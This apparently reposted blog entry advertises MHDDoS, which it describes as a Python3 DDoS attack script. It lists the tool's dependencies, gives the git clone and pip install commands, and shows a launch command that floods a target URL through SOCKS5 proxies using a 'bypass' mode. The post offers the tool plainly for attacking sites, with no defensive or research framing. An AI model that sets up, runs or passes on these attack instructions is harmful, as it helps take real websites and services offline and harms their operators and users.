Total Pageviews

Saturday 17 July 2021

MHDDoS

 DDoS Attack Script in Python3.

SCRIPT


You can download from GitHub Releases

Getting Started

Requirements

  • Python3
  • requests
  • PySocks
  • cfscrape
  • icmplib
  • scapy

Video's

toturial


Clone and Install Script

git clone https://github.com/MHProDev/MHDDoS.git
cd MHDDoS
pip3 install -r requirements.txt

Launch Script

python3 start.py
python3 start.py bypass https://example.com 5 1000 socks5.txt 100 100
from https://github.com/MHProDev/MHDDoS

No comments:

Post a Comment